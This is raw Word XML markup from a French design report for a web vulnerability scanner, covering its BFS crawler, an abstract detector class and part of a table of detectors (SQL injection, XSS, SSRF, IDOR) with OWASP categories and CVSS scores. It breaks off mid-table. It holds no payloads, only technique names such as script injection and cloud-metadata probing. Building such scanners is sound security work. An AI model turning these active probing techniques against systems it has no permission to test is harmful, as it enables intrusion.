      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Le diagramme de séquence illustre les interactions entre les objets lors d'un cycle de scan complet, depuis la commande CLI jusqu'à la génération du rapport HTML final.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1793724C" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Code : Diagramme de séquence — cycle de scan complet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0007D4" w14:textId="77777777" w:rsidR="000C0001" w:rsidRDefault="000C0001">
      <w:pPr>
        <w:spacing w:before="200" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5900000" cy="4795458"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2004" name="diag_sequence"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diag_sequence"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5900000" cy="4795458"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7661CA09"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2.5  Description Détaillée des Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2090AC0A" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>2.5.1  Module Crawler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6924BD58" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Le Crawler est le premier maillon du pipeline. Son rôle est de découvrir exhaustivement tous les points d'entrée testables de l'application cible : URLs avec paramètres GET, formulaires POST (login, recherche, upload), et endpoints d'API. Il utilise un algorithme BFS (file FIFO) pour explorer l'application de manière ordonnée et contrôlée en termes de profondeur et de nombre de pages visitées.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4180BE46" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Le Crawler extrait les types d'endpoints suivants :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03104D17" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>URLs avec paramètres GET : /search?q=test, /profile?id=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236A0DAD" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Formulaires HTML (GET et POST) : champs text, password, hidden, select, textarea</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369B60AB" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Formulaires multipart (enctype=multipart/form-data) : upload de fichiers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D86128" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Liens internes filtrés : exclusion des liens logout, javascript:, mailto:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6513F79F" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>La déduplication des endpoints se fait via une signature unique : METHOD:URL?sorted_params. Deux formulaires pointant vers la même URL avec les mêmes champs ne génèrent qu'un seul endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0F8287" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>2.5.2  Module BaseDetector (Classe Abstraite)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500F57DF" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>BaseDetector est la classe de base dont héritent tous les détecteurs actifs. Elle implémente le pattern Template Method : la méthode scan_all() orchestre la boucle sur tous les endpoints et appelle la méthode abstraite scan() implémentée par chaque sous-classe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AAF640" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Services fournis par BaseDetector à toutes les sous-classes :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B5F932" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>_send(url, method, params, data, headers) : envoi HTTP avec gestion des erreurs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0425EE6D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>_iter_injection_points(endpoint) : itère sur tous les paramètres injectables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E38776E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Chargement automatique des payloads depuis payloads/&lt;name&gt;.txt au démarrage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174A9AC5" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>scan_all(endpoints) : boucle principale + déduplication par signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242028F2" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>2.5.3  Les 12 Détecteurs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CF9A4B" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Tableau — Les 12 détecteurs et leurs caractéristiques</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2855"/>
        <w:gridCol w:w="855"/>
        <w:gridCol w:w="850"/>
        <w:gridCol w:w="2863"/>
        <w:gridCol w:w="850"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A6D93" w14:paraId="49411F7C" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="375EE293" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Classe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E26E523" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>OWASP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="45315CCF" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11C25D06" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Technique principale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="68777144" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="2C1DD532" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6261B375" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SQLiDetector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="592E806B" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68017ECE" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Actif</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C6AA14B" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Erreur SQL + time-delay + booléen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41BA88C5" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="1CB21DD3" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="0F889AA9" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>XSSDetector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="06A2016A" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="101D05F2" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Actif</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="4479BE80" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>Injection &lt;script&gt; + réflexion dans réponse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="0D8E0713" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>6.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="79E5BDF1" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="782EEAC9" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SSRFDetector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AF217A2" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74816A01" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Actif</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23CCA57F" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>URLs internes + métadonnées cloud</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CF5B9CC" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>8.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="135C7024" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="7DB4CA0C" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>IDORDetector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="1BB8262C" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="029D2A8C" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Actif</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="6275F80D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Incrémentation/décrémentation d'IDs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="62B9F798" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>6.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="3C285F41" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C46DA76" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
